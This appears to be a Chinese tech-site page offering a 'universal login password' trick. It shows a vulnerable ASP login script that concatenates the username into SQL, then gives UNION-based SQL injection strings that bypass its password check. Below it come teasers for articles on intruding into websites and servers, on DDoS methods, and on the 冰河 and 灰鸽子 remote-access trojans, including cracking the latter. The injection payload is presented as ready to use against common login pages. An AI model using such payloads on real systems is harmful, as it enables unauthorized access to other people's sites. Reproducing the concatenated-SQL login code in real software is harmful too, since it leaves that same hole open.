asp基础教程 验证asp注入的万能登录密码
《黑客手册》样刊里面,oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码:
程序代码
<%
username=trim(Request.Form("username"))
password=trim(Request.Form("password"))
sql="Select * FROM admin Where user='"&username&"'"
Set rs=Server.CreateObject("adodb.recordset")
rs.Open sql,conn,1,1
if rs.eof then
checksysUser=FALSE
else
passwd=trim(rs("pwd"))
if passwd=password then
Session("admin")=username
checksysUser=TRUE
else
checksysUser=FALSE
end if
End if
rs.close
conn.close
if checksysUser=true then
Response.Redirect("main.asp")
else
errmsg="用户名输入有误,请重新输入!"
end if
%>
先在数据库中查询用户名对应的密码,然后再和用户输入的密码对比,导致'or'='or'这样的万能登陆密码失效。
但如果在上面的程序中,用户名输入 程序代码
' UNION Select 1,1,1 FROM admin Where ''='
,密码输入1,就可以登陆成功,原理很简单,就不多说了。
顺便附上oldjun的语句:
程序代码
' UNION Select 1,1,1 AS pwd FROM admin Where ''='
脱壳软件有哪些?常用脱壳工具有哪些?
在自然界中,我想大家对壳这东西应该都不会陌生了,由上述故事,我们也可见一斑。自然界中植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译
详情2018-01-19 14:07:23责编:llp 来源:驱动管家游戏交易网怎么被入侵?游戏交易网的入侵方法
在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程一: 踩点 收集信息因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握服务器上13个站点,大多数站
详情2018-01-04 14:30:43责编:llp 来源:驱动管家大势至电脑文件防泄密系统安装时出现“用户密码错误”弹窗如何解决?
大势至电脑文件防泄密系统是一款保护电脑文件安全,防止员工随意将电脑文件外传的管理软件。系统分为两个版本,一个是单机版,适用于单机使用,另一个是网络版,适用于同一个局域网,可批量管理和修改用户电脑的
详情2018-01-30 09:29:15责编:llp 来源:驱动管家视频服务器有什么弱点?怎么入侵视频服务器?
视频服务器都会提供大量的视频资源,大部分都提供了在线观看以及下载服务。对于流量要求比较高,而从服务器本身的部署来看,也有一些特别之处。我们从一个入侵实例来看看视频服务器中暴露出的弱点。寻找漏洞我们
详情2018-01-25 17:08:38责编:llp 来源:驱动管家如何入侵redhat linux?入侵redhat linux的步骤
我写此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白:由于你们一个小小的操作失误可能会导致整个网络全面沦陷!本文主要是围绕UNIX下
详情2018-01-13 20:02:38责编:llp 来源:驱动管家cc攻击是什么?怎么防cc攻击网站?
CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,也是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一直到宕机崩溃。CC攻击
详情2018-01-13 14:51:33责编:llp 来源:驱动管家怎么利用ldap服务器攻击网站?ldap服务器攻击的威力
大家都知道前不久出现的DDoS攻击“Mirai”,导致美国半数的互联网瘫痪,是不是很厉害啊,现在下面就为大家介绍一个最新的DDoS攻击,要让DDoS攻击力更彪悍。LDAP据Corero网络安全公司披露,上周发现一种新型DDoS攻
详情2018-01-03 18:56:56责编:llp 来源:驱动管家电脑中了冰河木马病毒有哪些解决方法?
方法一:如果安装了“冰河”服务端的朋友就很简单了。首先在自动扫描中输入自己的IP,看一下扫描结果是否为“OK”,并且左边的“文件管理器”中会出现自己的IP吗?如果有,在“命令控制台”中的“控制类命令”
详情2018-01-28 20:24:52责编:llp 来源:驱动管家灰鸽子使用教程 破解灰鸽子成为注册会员
一、给灰鸽子脱壳要想得到灰鸽子的全部功能并挖出他的漏洞,就要给他脱壳。用ASPackdie给他脱壳(因为它是用ASPack加的壳),这个软件很好找,一些黑客网站上都有。先运行ASPackdie找到灰鸽子的主文件H_Client exe,
详情2018-01-17 10:25:13责编:llp 来源:驱动管家传奇服务器与洞网论坛在同一服务器上会出现漏洞
漏洞起因:很多白菜级的站长和管理员,把 "洞网论坛 "与传奇服务器同时架设到同一台服务器上!1 详细步骤:它时至今日,仍然有很多站长不知道去修改数据库的路径,所以,对于这招攻击很灵,特别是动网的,默认为dvbbs7
详情2018-01-27 14:58:20责编:llp 来源:驱动管家
- 吉吉影音怎么样?吉吉影音为什么不能播放?
- 射手网关闭了还能下载字幕吗?字幕下载工具怎么用?
- 东芝r100笔记本电脑没有光驱怎么装系统
- 小米盒子怎么用?小米盒子几个常用功能介绍
- 在linux系统下怎么去实现网络存储?搭建gfs系统就可以了
- win10电脑语音助手小娜的箭头图标怎么操作
- 华为g7 plus评测报告 华为g7 plus值得买吗?
- qq可以上网页打不开?如何排除iPhone手机网络故障?
- 任务栏变宽是什么原因?任务栏变宽怎么还原?
- 小米路由器3连接硬盘是怎么操作的?小米路由器连接硬盘方法
- 怎么做后台deamon来控制安全访问?这里有个后台脚本
- 哔咔哔咔漫画是什么?哔咔哔咔漫画怎么用?
- 路由器安装好后怎么设置路由器密码?路由器密码设置方法
- 这些戴尔e6400笔记本的特殊功能你可能不知道
- 戴尔灵越14r笔记本电脑的外壳可以更换吗?戴尔灵越14r怎么换外壳
- skype无法连接的情况有什么办法可以解决
- 上网的时候被限制网速了教你这样解除
- 苹果手机定位不安全,容易暴露个人信息
- 电池容量也有假?电池容量不达标导致电量不经用
- 电脑软键盘上都有哪些特殊符号?软键盘可以打出的特殊符号汇总